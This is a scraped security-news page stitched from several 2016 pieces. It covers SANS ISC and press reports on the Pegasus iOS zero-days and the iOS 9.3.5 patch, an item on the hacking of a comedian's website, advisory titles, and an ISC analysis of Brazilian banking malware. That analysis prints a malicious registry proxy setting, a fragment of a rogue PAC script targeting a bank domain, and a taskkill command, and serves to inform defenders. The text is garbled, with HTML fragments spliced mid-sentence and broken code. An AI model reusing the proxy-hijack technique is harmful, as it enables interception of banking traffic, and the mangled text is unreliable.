(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

A new spyware has been discovered on the Apple platform. Called Pegasus [1], it turns out to be a sophisticated targeted spyware. Developed by professionals, it uses 0-day vulnerabilities, code obfuscation and encryption techniques.

Apple released today an out-of-band patch for iOS (version 9.3.5) [2]. It fixes three critical vulnerabilities:

CVE-2016-4655 (Memory Corruption in Safari Webkit)
A memory corruption vulnerability exists in Safari Webkit that allows an attacker to execute arbitrary code. Pegasus exploits this vulnerability to obtain initial code execution privileges within the context of the Safari web browser.

CVE-2016-4656(Kernel Information Leak Circumvents KASLR)
Before Pegasus can execute its jailbreak, it must determine where the kernel is located in memory. Kernel Address SpaceLayout Randomization (KASLR) makes this task difficult by mapping the kernel into different and unpredictable locationsin memory.

CVE-2016-4657(Memory Corruption in Kernel leads to Jailbreak)
The third vulnerability in Pegasus Trident is the one that is used to jailbreak the phone. A memory corruption vulnerabilityin the kernel is used to corrupt memory in both the 32- and 64-bit versions. The exploits are performed differently oneach version.

Check on the Apple website if the patch is available for your device and install it as soon as possible (via the usual way: iTunes or Software Updates on your device)


Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Linux Kernel Local Denial of Service Vulnerability
APPLE-SA-2016-08-25-1 iOS 9.3.5

Enlarge / iPhone Spyware known as Pegasus intercepts confidential data. (credit: Lookout)

Apple has patched three high-severity iOS vulnerabilities that are being actively exploited to infect iPhones so attackers can steal confidential messages from a large number of apps, including Gmail, Facebook, and WhatsApp, security researchers said Thursday.

The spyware has been dubbed Pegasus by researchers from mobile security provider Lookout; they believe it has been circulating in the wild for a significant amount of time. Working with researchers from University of Toronto-based Citizen Lab, they have determined that the spyware targeted a political dissident located in the United Arab Emirates and was launched by an US-owned company specializing in computer-based exploits. Based on the price of the attack kit—about $8 million for 300 licenses—the researchers believe it's being actively used against other iPhone users throughout the world.

"Pegasus is the most sophisticated attack we’ve seen on any endpoint because it takes advantage of how integrated mobile devices are in our lives and the combination of features only available on mobile—always connected (WiFi, 3G/4G), voice communications, camera, email, messaging, GPS, passwords, and contact lists," Lookout and Citizen Lab researchers wrote in a blog post. "It is modular to allow for customization and uses strong encryption to evade detection."

Read 8 remaining paragraphs | Comments

Sudo Local Information Disclosure Vulnerability

Enlarge (credit: Andrew Cunningham)

Just a few weeks after posting iOS 9.3.4 to fix a jailbreaking-related bug, Apple has released iOS 9.3.5 to all supported iPhones and iPads. The update provides an "important security update" and comes just a few weeks before the expected release of iOS 10, which is currently pretty far along in the developer/public beta process.

Update: Apple also tells us that these bugs were fixed in the latest versions of the iOS 10 public and developer betas, which were released last week.

Apple's security release notes say that three bugs have been fixed, two in the iOS kernel and one in WebKit. The bugs were discovered by Citizen Lab and Lookout, which said they were actively exploited to hijack the iPhone of a political dissident. Lookout collectively calls the three zero-day vulnerabilities "Trident," and says that they could allow an victim's personal data to be accessed after opening a link sent in a text message. Trident infects a user's phone "invisibly and silently, such that victims do not know they’ve been compromised." We'll have more information about the vulnerability in a forthcoming article.

Read 2 remaining paragraphs | Comments


Enlarge (credit: Getty Images/Gregg DeGuire/WireImage)

Leslie Jones, the black comedian who starred in the recent all-female remake of Ghostbusters, has been forced to take her website down after hackers seemingly took control, posted racist abuse, personal information, and what were apparently nude pictures stolen from the actor's iCloud account

Jones, 48, has been the target of sustained online attacks for months, much of it racist and sexist in nature.

On Wednesday, hackers escalated the situation by posting a picture of the dead gorilla Harambe onto her personal Tumblr site, as well as explicit photos, her phone number and Twitter password, and screen grabs of her driver's licence and passport, according to TMZ.

Read 4 remaining paragraphs | Comments

GAITHERSBURG, Md.?The U.S. Commerce Departments National Institute of Standards and Technology (NIST) has awarded six pilot grants totaling more than $15 million to foster more secure access to online services provided by states and ...
IBM WebSphere Application Server CVE-2016-0385 Security Bypass Vulnerability
SEC Consult SA-20160825-0 :: Multiple vulnerabilities in Micro Focus (Novell) GroupWise

Yesterday, I discovered a nice example of targeted attack against a Brazilian bank. It started with an email sample like this:

This message was sent to a Brazilian citizen. Redacted in Portuguese, it could be approximately translated with the help ofGoogle to: Please find attached the pay slip of Augustus 2016 which expires on Monday 29/08/2016....

The picture is a link to a RAR file visualizar_imprimir.rar (MD5: c2781a11e7de53cc0ddb2161628454cb) which contains a malicious PE file visualizar_imprimir.exe"> \REGISTRY\USER\S-1-5-21-xxxxxxxx\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoConfigURL = http://chrome-ie.com.br/1.png

Note: files from 0.png to 9.png are available and they have the same content.

This registry key will force the browser to fetch the file and apply the new settings. Indeed, the file 1.png"> function FindProxyForURL(url, host){var a = PROXY (shExpMatch(host, www.san*ander.com.br*)) {}if (shExpMatch(host, san*ander.com.br*)) {}return DIRECT"> taskkill /F /IM chrome.exe

From now, if the victimvisits www.san*ander.com.br*, his/her browser will forward all requests to the rogue proxy server running on otherwise it will fetch all other URLs directly. I tested the proxy (a Squid/3.3.8) with other URLs and I always got a permission denied. Normal behavior or configuration error? I don" />

As you can see with this example, it is quite easy to hijack the traffic from specific websites. With this technique, no need to use a complex exploit or to try to break the encryption. Just change the browser behavior and you will get a copy of all the victims traffic.

Stay safe!

[1] https://www.virustotal.com/en/file/cccbd8a8d485d386486cf790ada90415ac71ef7e637e7abcc4d39bf443d7b4fe/analysis/1472040570/
[2] https://en.wikipedia.org/wiki/Proxy_auto-config
[3] %%ip:

Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

WebKitGTK+ Security Advisory WSA-2016-0005
Internet Storm Center Infocon Status